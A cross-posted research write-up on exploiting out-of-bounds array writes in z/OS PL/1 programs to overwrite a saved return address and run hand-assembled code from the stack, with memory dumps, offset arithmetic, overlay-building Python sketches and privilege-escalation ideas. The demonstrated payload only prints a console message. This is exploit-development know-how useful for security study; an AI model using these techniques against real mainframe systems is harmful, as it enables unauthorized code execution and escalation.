The following is a cross-post from REDDIT, reposted here with permission from the author @_Ciq (twitter) – Excellent write-up!!! -BeS
<Big wall of text trigger warning.>
Over the past few months I’ve been becoming increasingly interested in the CTF concept; finding (purposely built) flaws in software and exploiting them so that arbitrary code can be executed. Having an IBM mainframe background, I was wondering if a similar exercise could be made for that platform. Considering I only have access to a PL/1 compiler, I set out to see if its calling conventions can be exploited.
A typical security flaw for x86 systems consists of overflowing a buffer that lives on the stack, in order to overlay the piece of memory that contains the return address, which coincidentally also lives on the stack, to change the location that a subroutine will return back to. A good example is a string buffer overflow, where the programmer carelessly copied a character array without checking the sizes of both the source and the target.
Writing over this return address is trivial because a buffer will usually live close to said return address on the stack. This is because the x86 architecture revolves around a stack, and because of the common calling conventions used in x86 programs.
The Language Environment and its workings.
IBM mainframe programs written in compiled languages (COBOL, PL/1, C/C++, Java) are (since relatively recently) subject to being Language Environment (LE) compliant. Compilers will provide compliance automatically. The LE exists to provide a standardized calling convention, standardized tracing, and standardized debugging.
LE programs are, despite the z/Architecture not inherently being stack based, reliant on a stack structure. As a prologue to each procedure being executed, it will set up what is called a Dynamic Storage Area (DSA), which ties in with the calling conventions. It contains a couple of things;
- A pointer to the DSA of the procedure that called the current DSA’s procedure.
- A pointer to the DSA of the procedure that this DSA’s procedure called. (Optional, IBM compilers ignore this field.)
- A save area where all registers are saved when the current DSA’s procedure calls another procedure.
- A pointer to the next free byte on the stack. This gets set depending on how much storage the procedure needs for stack variables. It is used by any procedure called by this procedure to quickly determine where it can build its DSA.
And then some, but these things are the most important for us right now.
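To make the list above concrete, here is a minimal Python sketch of the first words of a DSA. The offsets for the caller pointer (0x04), saved register 14 (0x0C) and saved register 2 (28) are the ones that show up later in this post. The forward pointer at 0x08 and the remaining register slots follow the standard save area layout, and the next-available-byte offset 0x4C is an assumption that should be checked against the IBM documents and your own listings. All names are made up for illustration.

```python
import struct

# Offsets into a DSA, as big-endian 4-byte words.
DSA_BACK_CHAIN = 0x04     # pointer to the caller's DSA
DSA_FORWARD_CHAIN = 0x08  # pointer to the callee's DSA (optional)
DSA_R14 = 0x0C            # saved register 14 (the return address)
DSA_R15 = 0x10            # saved register 15
DSA_R0 = 0x14             # saved registers 0..12 follow, 4 bytes each
DSA_NAB = 0x4C            # next available byte on the stack (assumed offset)


def register_offset(reg: int) -> int:
    """Offset of the save slot for a register inside the DSA."""
    if reg == 14:
        return DSA_R14
    if reg == 15:
        return DSA_R15
    if 0 <= reg <= 12:
        return DSA_R0 + 4 * reg
    raise ValueError("register 13 is kept in the back chain, not in a register slot")


def read_dsa(mem: bytes, dsa: int) -> dict:
    """Pick the fields this post cares about out of a DSA at address `dsa`."""
    def word(offset: int) -> int:
        return struct.unpack_from(">I", mem, dsa + offset)[0]

    return {
        "caller_dsa": word(DSA_BACK_CHAIN),
        "return_address": word(DSA_R14),
        "next_available_byte": word(DSA_NAB),
    }
```

The only point of the sketch is that the saved return address sits at a fixed, known offset from the start of every DSA.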
z/Architecture has 16 general purpose registers. Unlike x86, they don’t have physically enforced functions. Everything is convention. The contents of registers can be important to a procedure. Hence upon calling another procedure, the contents of the registers must be saved.
There is no CALL assembler instruction in the z/Architecture. A call is compiled to a hard branch. There are several types of branches. A call to a procedure would typically be compiled to a branch with two operands: the register containing the address to branch to, and the register in which to save the location of the instruction right after the current branch instruction, which serves as a return address for the called procedure (this is very important). There are two calling conventions in the mainframe world; caller saves and callee saves. In LE, the callee saves the registers of the caller, and it does this in the register save area that is in the caller’s DSA (third item in the list above). The registers are restored from that save area when the callee returns control to the caller.
For the sake of materializing this abstract explanation; upon a call-type branch, the address to return to will be saved in register 14.
In x86 calling conventions, the stack pointer grows higher and lower by POPing and PUSHing items to it. On z/Architecture, there is a register that is the stack pointer, but only by convention. No one is forcing anyone to use any register as a stack pointer. LE has chosen register 13 to be the stack pointer. You don’t push and pop items to the stack on z/Architecture. On a call, the LE sets the stack pointer (by checking where the next available stack byte is, which was determined at the start of the calling procedure), determines where the next stack frame should start (saved at ), and constructs its DSA at the currently set stack pointer. Your stack variables live right after the DSA and are accessed by addressing memory relative to the stack pointer. Typically when you compile a program, the listing will include the offsets of the variables to the beginning of the DSA for each procedure. Notice how this makes it annoying to dynamically allocate stack variables.
When setting up the DSA, a procedure (callee) will keep a pointer of the caller’s DSA, in its own (callee’s) DSA.
When a procedure wants to return to the procedure that called it, it needs an address to return to. As we discussed earlier, that address was originally saved in register 14 when the branch to the callee happened. The callee then proceeded to save all registers (including register 14) in the savearea set up in the caller’s DSA. The callee keeps a pointer to its caller’s DSA. So the callee can perfectly fetch the address it needs to return to. Take away from this that the return address lives on the stack, in proximity to stack variables.
How to exploit this?
On x86 architecture, string copies will compile to loops of byte moves. On z/Architecture, we can do this with one single assembler instruction; MVC. MVC takes the target location, a length, and a source location. Considering that strings are defined with a fixed length in mainframe programming languages (including PL/1), the compiler is aware of each string’s length at all times. As a result, if you try to assign a 10 byte string in to a 5 byte string, the compiler will do two things. Warn you that you’re doing something silly, and compile to an MVC instruction with length parameter 5, copying only the first half of the 10 byte string. As a result, exploiting string copies simply doesn’t work, because you can’t write exploitable code that way.
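A small Python model of that behaviour may help. It is only a sketch of what the compiled MVC ends up doing, not of the instruction itself: the function name is hypothetical, and padding short sources with EBCDIC blanks (0x40) is how fixed-length character assignment is assumed to behave here.

```python
EBCDIC_BLANK = b"\x40"


def assign_fixed(target_len: int, source: bytes) -> bytes:
    """Model assigning `source` to a fixed-length string of `target_len` bytes.

    The copy length is the target's declared length, known at compile time,
    so a longer source is truncated and can never spill past the target.
    """
    copied = source[:target_len]
    return copied.ljust(target_len, EBCDIC_BLANK)
```

Whatever the source looks like, the result is exactly `target_len` bytes long, which is why this route gives us nothing to overflow.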
As a mainframe assembler programmer, I understood this fairly quickly. So I had to find another attack vector. In my limited research in to software vulnerability exploitation, I learned that a typical sign of having found a buffer overflow is when the application crashes. z/Architecture, and S/360 before it, rely heavily on ABENDs (abnormal ends). When an ABEND happens, it is accompanied by a code. One of the most common ABEND codes is S0C1. A S0C1 happens when the CPU is decoding an instruction, but finds that the OPCODE does not exist. Assuming that the IBM compilers are flawless, this almost always means that the program managed to branch to an area of memory containing data, and not instructions. For the times I was called up in the middle of the night to resolve a S0C1, it’s a welcome change that this is exactly what I wanted to happen for once.
So what programmer errors usually cause S0C1 ABENDs? Addressing an array with an index larger than it was allocated with. How does this happen? Same way x86 buffer overflows happen, no size checking.
Take a developer who knows that business rules dictate that no one can have more than 5 checking accounts. In a batch program that lists checking accounts, he has an array in which he loads the current person’s 5 checking accounts. He opens a cursor to the database, and starts fetching rows from the resultset, increasing an integer each time he writes a checking account to the array. Sometime, usually around 3:00 AM, the program will treat a person who somehow managed to open 6 checking accounts. The program tries to store the fetched row at an address that it shouldn’t, and sooner or later, the application breaks. S0C1.
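The same mistake can be sketched in Python on top of a flat block of memory. Everything here is hypothetical (the 8-byte row size, the names, the neighbouring field); the point is only that the address of element 6 is computed just like the address of element 5, and nothing stops the write.

```python
ROW_SIZE = 8        # assumed size of one checking account row
MAX_ACCOUNTS = 5    # what the business rules promised


def store_account(memory: bytearray, array_base: int, index: int, row: bytes) -> None:
    """Store `row` as element `index` (0-based) without any bounds check."""
    start = array_base + index * ROW_SIZE
    # Pad or cut the row to exactly one element so the memory size never changes.
    memory[start:start + ROW_SIZE] = row.ljust(ROW_SIZE, b" ")[:ROW_SIZE]


def load_accounts(rows: list) -> bytearray:
    """Array of MAX_ACCOUNTS rows at address 0, followed by an unrelated field."""
    memory = bytearray(MAX_ACCOUNTS * ROW_SIZE) + bytearray(b"NEIGHBOR")
    for index, row in enumerate(rows):  # no check against MAX_ACCOUNTS
        store_account(memory, 0, index, row)
    return memory
```

With five rows the trailing field survives; with six, the sixth row lands on top of it.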
Now that’s still pretty far from an exploit. But; we found that stack variables live close to return addresses on the stack, and we found that we can write to parts of the stack that we’re not supposed to write to. Good luck opening a 6th checking account which will meaningfully overlay a return address though, that’d be something.
Now, the LE stack grows upwards (unless forced through options in the LE parameters to do the opposite, which literally no one does, because why?). This is annoying! If we manage to write to an address higher than the highest address of an array, we’re just writing in to uninitialized stack space, which doesn’t help us at all.
There is still an attack vector though; globally declared arrays. When a program gains control (we’ll call this level 0), it sets up its DSA as if it’s a procedure, and its stack variables go right above it. When a subroutine (level 1) is called from level 0, its DSA lives just above those globally declared stack variables. If we can get a globally declared array to write out of its bounds, it’ll eventually write in to level 1’s DSA.
Writing in to level 1’s DSA when we’re executing as level 1 doesn’t help us any though. The return address that level 1 returns to lives in the DSA of level 0 (register 14 containing the return address is saved in the caller’s DSA remember?), which lives under the globally declared variables. We can attack any level’s return address higher than level 0’s though. So if we can write out of bounds to a globally declared array from level 2 or higher, we’re golden. Note how a problem can arise as soon as more global variables live between the array we want to abuse, and the DSA we want to attack. If those are critical for a procedure to get to the point where it will return to its caller, it won’t, because they are destroyed when smashing the stack. Unless we put meaningful stuff in there, but this makes things much more complicated.
There is an exception to this. When you pass a pointer to an array (one that lives somewhere between two levels’ DSAs) to a higher level procedure as an argument, you effectively extend the scope of that array to that procedure. This case is incredibly rare in the real world, I’d assume, since most PL/1 programmers I know don’t know about procedure arguments, and much less about pointers.
Working Proof of Concept.
So now to put this in practice.
We’re going to use a massively simple PL/1 program. Initially, I wanted to read a file line by line until it reached its end of file status, copying each line to a globally declared array, without bounds checking of course. When there are as many lines in the file as there are lines allocated for the array, we’re fine. But as soon as we add another, we’d be overwriting the DSA of the level 1 procedure. This doesn’t work. I know roughly why (reading a file’s line is a call in itself), but not exactly why (the read file call is a call to a closed source procedure, and I’m pretty sure it needs the complete DSA chain to be intact).
So what I do is I read all lines in to an array, then copy the elements of that array one by one in to an array with one element less allocated to it. I cheat twice in this PoC, this is the first. I’m working on a better concept with less cheating, of course.
From here on out it’s basically sitting through debugging sessions, learning offsets within the stack by comparing memory contents with listings, knowing the layout of the DSA, and knowing how a procedure gets its return address.
Turns out that in order to get a return address, a procedure will get its stack base + offset 0x04, which contains a pointer to its caller’s DSA, and then get that address + offset 0x0C, which is where register 14 (the return address, remember?) was saved during the callee’s prologue.
L    r13,4(,r13)     R13 is stack base, aka our DSA location. Load location of caller's DSA (our DSA + offset 4) in register 13.
L    r14,12(,r13)    R13 is now caller's stack base, aka its DSA location. At offset 12 to it, we find where register 14 was saved. We load this in to register 14.
LM   r2,r6,28(r13)   Restore registers 2 through 6 from the savearea.
BALR r1,r14          Return to the address in register 14, and store the address right after this instruction in register 1.
So we need to craft an overlay that will overwrite offset 0x0C in the DSA to change where the program will branch to when trying to return to that DSA’s procedure.
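Here is a toy Python simulation of that idea: a minimal sketch with made-up addresses, not the real PoC. It assumes a level 0 DSA, a global array of five 80-byte elements, level 1's DSA a bit above the array, and level 2's DSA above that. `return_target` mimics the two loads from the epilogue above; every name and address is hypothetical.

```python
import struct

BACK_CHAIN = 0x04    # offset of the pointer to the caller's DSA
SAVED_R14 = 0x0C     # offset of the saved return address
ELEMENT_SIZE = 80


def load_word(mem, addr):
    return struct.unpack_from(">I", mem, addr)[0]


def store_word(mem, addr, value):
    struct.pack_into(">I", mem, addr, value)


def return_target(mem, r13):
    """Where a procedure whose DSA is at `r13` will return to."""
    caller_dsa = load_word(mem, r13 + BACK_CHAIN)    # L r13,4(,r13)
    return load_word(mem, caller_dsa + SAVED_R14)    # L r14,12(,r13)


def build_toy_stack():
    """Toy stack that grows upwards: level 0, global array, level 1, level 2."""
    mem = bytearray(0x400)
    layout = {"level0_dsa": 0x000, "array": 0x080,
              "level1_dsa": 0x248, "level2_dsa": 0x300}
    store_word(mem, layout["level1_dsa"] + BACK_CHAIN, layout["level0_dsa"])
    # Level 2's legitimate return address, saved in its caller's (level 1's) DSA.
    store_word(mem, layout["level1_dsa"] + SAVED_R14, 0x00001000)
    store_word(mem, layout["level2_dsa"] + BACK_CHAIN, layout["level1_dsa"])
    return mem, layout


def write_element(mem, array_base, index, data):
    """Unchecked write of one 80-byte element (0-based index)."""
    start = array_base + index * ELEMENT_SIZE
    mem[start:start + ELEMENT_SIZE] = data.ljust(ELEMENT_SIZE, b"\x00")[:ELEMENT_SIZE]
```

In this toy layout the array ends at 0x210 and level 1's DSA starts at 0x248, so a sixth element carrying an address at offset 68 lands exactly on level 1's saved register 14, and the next `return_target` for level 2 comes back with that address instead of 0x1000.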
In our example, the stack looks something like this right before we write the 6th element to an array with 5 elements;
0 - 2 - 4 - 6 - 8 - A - C - E - = 0-2-4-6-8-A-C-E-
******************************** TOP OF DATA **********************************
192A6878 ===> A715000D 00160000 C7C8D6E2 E340C9D5 = x.......GHOST IN
192A6888 ===> 40E97DE2 40E2C8C5 D3D30A23 00000000 = Z'S SHELL......
192A6898 ===> 00000000 00000000 00000000 00000000 = ................
192A68A8 ===> 00000000 00000000 00000000 00000000 = ................
192A68B8 ===> 00000000 00000000 00000000 00000000 = ................
192A68C8 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A68D8 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A68E8 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A68F8 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A6908 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A6918 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6928 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6938 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6948 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6958 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6968 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A6978 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A6988 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A6998 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A69A8 ===> C2C2C2C2 C2C2C2C2 C2C2C2C2 C2C2C2C2 = BBBBBBBBBBBBBBBB
192A69B8 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A69C8 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A69D8 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A69E8 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A69F8 ===> C1C1C1C1 C1C1C1C1 C1C1C1C1 C1C1C1C1 = AAAAAAAAAAAAAAAA
192A6A08 ===> 187C3150 192A65B8 188DD070 00044040 = .@.&......}...
192A6A18 ===> 0020A000 187C35A8 00000000 00000000 = .....@.y........
192A6A28 ===> 1929C95C 00048001 00606002 187C35B4 = ..I*.....--..@..
192A6A38 ===> 00000000 00000000 10000000 192A65B8 = ................
192A6A48 ===> 192A9B38 987C357A 187C31B8 00000080 = ....q@.:.@......
192A6A58 ===> 987C340E 192A6B18 187C358C 187C3AF4 = q@....,..@...@.4
192A6A68 ===> 192A65B8 187C3A70 187C35A8 18B937F0 = .....@...@.y...0
192A6A78 ===> 00000008 00000000 192A6230 18B94BD8 = ...............Q
192A6A88 ===> 00000000 192A6B88 18B0C5E0 18B93460 = ......,h..E\...-
192A6A98 ===> 00000000 192A6AC8 192A6AB4 192A62F4 = ......¦H..¦....4
192A6AA8 ===> 192A6AB8 9940A388 192A6C98 000015A0 = ..¦.r th..%q....
Address 192A6878 is the location of the first element in the array. It’s also our payload (more about that later). Each element is 80 bytes long, so element 2 starts at 192A68C8, etc etc. The 6th element (for which no allocation was made!) will be written to 192A6A08, which contains garbage. Between the end of the stack variables and the beginning of another DSA exists some padding, since the compiler aligns DSAs in a certain way. The DSA that lives right above this array is level 1’s DSA. It starts at address 192A6A40, I know this because I studied the offsets within a DSA (IBM documents) and the offsets of the stack variables to the stack frame base, which I get from the output listing when compiling the program (you don’t get this in real life). Offset 0x0C to the DSA base is the address that this DSA’s procedure has its callees return to.
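The address arithmetic in that paragraph is easy to double check. A short Python sketch, using only the addresses from the dump above (the function and constant names are made up):

```python
ARRAY_BASE = 0x192A6878   # first element, from the dump
ELEMENT_SIZE = 80
ALLOCATED_ELEMENTS = 5
LEVEL1_DSA = 0x192A6A40   # start of level 1's DSA


def element_address(n: int) -> int:
    """Address of element n (1-based), whether or not it was ever allocated."""
    return ARRAY_BASE + (n - 1) * ELEMENT_SIZE


def padding_before_dsa() -> int:
    """Bytes between the end of the allocated array and level 1's DSA."""
    return LEVEL1_DSA - element_address(ALLOCATED_ELEMENTS + 1)
```

`element_address(2)` gives 0x192A68C8 and `element_address(6)` gives 0x192A6A08, matching the dump, and the padding works out to 0x38 (56) bytes.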
Our payload will be 80 bytes long, because each element in the array is 80 bytes long. We get to inject our payload at 192A6A08, and the memory location we need to overlay is 192A6A4C. That’s at an offset of 68 (decimal), to the beginning of our payload. So our payload looks something like this in EBCDIC (yeah we don’t play with ASCII or UTF too well);
Hexadecimal it looks like this;
Notice how I put a valid (31 bit, it looks like 32 bits) address in the location that will be overlaid over the return address in the caller’s DSA. It’s 992A6878[*], the address of the first element of the array we’re attacking. I conveniently injected executable code on to the stack in this way. I could have put it in any element, including the 6th which overlays the return address. I could’ve also put it in common storage by using another program (z/Architecture memory layout feature), memory that is accessible by every address space.
* The address shown by the debugger is 192A6878, not 992A6878. The latter address has bit 0 flipped to 1, which indicates (in z/Architecture) that the program is running in 31 bit mode, which is the successor of the 24 bit mode before it. The debugger has problems with this, but the program is in fact running in 31 bit mode, and the address of the executable payload should have bit 0 flipped to 1.
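Putting the offset and the 31 bit flag together, building such an overlay could be sketched like this in Python. The addresses are the ones from this post; the filler byte (EBCDIC 'A', 0xC1) is purely an assumption for illustration, since everything outside the four address bytes only has to avoid breaking whatever runs before the return.

```python
import struct

INJECT_AT = 0x192A6A08      # where the 6th element gets written
RETURN_SLOT = 0x192A6A4C    # level 1's DSA + 0x0C
PAYLOAD_ADDR = 0x192A6878   # first element of the array, as the debugger shows it
AMODE31_BIT = 0x80000000    # bit 0 set: 31 bit addressing mode
ELEMENT_SIZE = 80


def build_overlay(filler: int = 0xC1) -> bytes:
    """One 80-byte element that puts the payload address on the return slot."""
    offset = RETURN_SLOT - INJECT_AT          # 68 decimal
    target = PAYLOAD_ADDR | AMODE31_BIT       # 0x192A6878 becomes 0x992A6878
    overlay = bytearray([filler]) * ELEMENT_SIZE
    struct.pack_into(">I", overlay, offset, target)
    return bytes(overlay)
```

Note that the same element also overwrites the first 12 bytes of level 1's DSA and a few words after the return slot, so in a real program the filler would have to be chosen with care.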
This is also the second time I cheat by the way. I can’t easily find the address of our payload, it changes from execution to execution (more about this later). So to make it easy for myself, I print the address of the first element of the array to the spool, from the program itself, effectively telling me where I need to force the program to branch to. No program in the real world will do this for you!
So; this payload will make the program branch to our executable payload as soon as any procedure, no matter how many levels deep we are right now, tries to return to level 1.
So what’s in our payload?
x GHOST IN Z'S SHELL
It’s the machine code (hand)compiled from assembler instructions looking like this;
BRAS 1,<symbol>              Branch relative to the current address, save address after this instruction in register 1. We branch forwards 13 halfwords (0xD), or 26 bytes: 4 for the BRAS itself plus 22 for our parm list.
DC   AL2(22)                 Constant of 2 bytes, contents are integer '22' (the 0016 in the dump). Length of parameters.
DC   B'0000000000000000'     Constant of 2 bytes, contents binary zeroes. Parameters for SVC.
DC   C'GHOST IN Z''S SHELL'  Constant of 18 bytes (the apostrophe is doubled in assembler source), you know the contents. Message to display.
SVC  35                      Make supervisor call 35.
Supervisor call 35 wants register 1 to contain a pointer to where its parameters are in memory. The parameters are in between the branch and the supervisor call. By branching over the parameters, straight to the SVC, and saving the address of the parameter list in register 1 by doing so, we accomplish a lot in just one instruction.
Supervisor call 35 is “Write To Operator”, or WTO. It writes a message to the consoles that are configured to display this particular message. It actually displays it so that’s fun.
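The bytes at the start of the dump can be taken apart again with a few lines of Python. This is only a sanity check on the first 28 bytes of the first array element as shown above; it uses Python's `cp037` codec as a stand-in for the EBCDIC code page, which is an assumption about the code page in use, and the field names are made up.

```python
PAYLOAD_HEX = "A715000D 00160000 C7C8D6E2 E340C9D5 40E97DE2 40E2C8C5 D3D30A23"


def decode_payload(hex_text: str) -> dict:
    raw = bytes.fromhex(hex_text.replace(" ", ""))
    # BRAS is opcode 0xA7 with 5 in the low nibble of the second byte;
    # the high nibble of that byte is the register that gets the address.
    assert raw[0] == 0xA7 and raw[1] & 0x0F == 0x5
    halfwords = int.from_bytes(raw[2:4], "big", signed=True)
    parm_length = int.from_bytes(raw[4:6], "big")  # includes the 4-byte prefix
    svc_at = 2 * halfwords                         # relative to the BRAS itself
    return {
        "link_register": raw[1] >> 4,
        "branch_bytes": 2 * halfwords,
        "parm_length": parm_length,
        "flags": int.from_bytes(raw[6:8], "big"),
        "text": raw[8:4 + parm_length].decode("cp037"),
        "svc_opcode": raw[svc_at],
        "svc_number": raw[svc_at + 1],
    }
```

The decoded fields line up with the listing: register 1, a branch of 26 bytes, a parameter length of 22, the message text, and 0x0A with 35 behind it, which is the SVC.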
This is arbitrary code being executed from an LE enabled program running under z/OS on a z/Architecture machine.
Random notes and thoughts.
z/Architecture does not feature executable space protection, nor does it have the possibility to mark memory as non-executable. This makes it very easy for us to inject code. As long as we can get it in memory, we can execute it.
z/Architecture does not feature ASLR, explicitly. The address at which the array in our PoC lives changes from time to time though. I’ve been doing some documentation digging (which is all I can do because IBM is closed source when it comes to code), and found that the stack is allocated at the start of an LE program with a GETMAIN SVC call (standard stuff). This triggers the Virtual Storage Manager to find an empty piece of memory with the size that was requested, with the characteristics requested. Why, and under what circumstances the VSM decides that another virtual page should be used this execution, as opposed to any other execution, I don’t know yet. I’m afraid I’ll have to reverse engineer parts of the GETMAIN SVC and VSM for that. Or go work for IBM?
z/Architecture features memory protection in the form of protection keys. You can only edit memory that has the same protection key as the address space you’re running in. Protection keys run from 0-15 and are set when the address space is started. This protects userland programs from fucking up system areas that live in common storage. You cannot change the protection key of your address space*. When you allocate (virtual) memory, that memory is marked with the protection key of the address space that requested it.
z/Architecture features certain instructions that are protected. You can only run them when your program is compiled to be APF-authorized, and resides in an APF-authorized (z/OS option) library. Userland programs will never be APF authorized. APF authorization allows you to switch from problem state to supervisor state. Supervisor state allows you to change your protection key.
Since we’re probably only going to find vulnerabilities in userland programs, which aren’t (I hope in all shops) APF-authorized, we won’t be able to completely own the system. But we’ll be able to shit on a lot of stuff regardless.
If a vulnerability is found in an APF authorized program, some serious escalation can occur. This was part of the exploit-chain used by Warg to shit on Logica’s (Swedish bank) mainframes. An APF authorized program can create a new SVC. Warg introduced a new SVC which allowed any program to escalate its APF authorization (APF authorization is nothing but a bit in protection key 0 storage, which you can write to from an SVC since those run in key 0, supervisor mode). So any program you run, you can call that SVC and switch it to be APF authorized. This allowed him to hold control over the machine for a very long time, since this is seriously hard to find when you’re trying to protect the system.
Considering how simple the PoC is, I hope it’s clear that in order to be able to exploit a vulnerability, the planets really need to align. The vuln needs to exist, you need to somehow figure out how to craft the payload (hard if you’re not on the system and don’t have access to source code, compile listings, and a debugging session), and get the payload on the system. Then, when you have arbitrary code execution, you need to know how the system is set up to do interesting stuff. Open sockets, create files, edit files, delete files, what have you.
I mentioned earlier that it would be interesting to introduce the arbitrary code that we want to execute in to the common storage area, which is accessible by every address space. Address spaces are limited in what they can do based on authorities granted to the user they are started with by RACF. Authorities are for example; what files they have access to, what commands they can execute.
If you find a vulnerable program, but fail to inject enough code, you can use another program to inject it in to common storage, get a pointer to it, and then use that pointer as a target address for your exploit. Since the code being run from common storage would run in the address space of the vulnerable program, it’d be running under the user that the vulnerable program was started with. This is potential privilege escalation, as you get to do more stuff than you were originally allowed to do. Note that you first need to be able to log on to the system in order to inject anything in to common storage, which under normal circumstances you shouldn’t be allowed to.
So is it possible to “stack smash”, or “smash the daisy chain” (as I like to call it) of z/OS LE programs? Yes.
Will you be hard pressed to find a vulnerability? Yes.
Will you be even more hard pressed to somehow be allowed by business rules to inject something that is executable? Yes. My visa account number is sadly not executable machine code.
If you’re reading this because one of your managers is flipping out, I’m sorry.
I’m really new at this exploiting stuff, and probably missing a lot of easy things that could make the process of finding and abusing vulnerabilities a lot less complicated. If someone with more experience wants to get in to this, I’d be more than happy to help them get started, because I know I’ll get my return on investment when that person surpasses me and can teach me in return.
Link to original Reddit post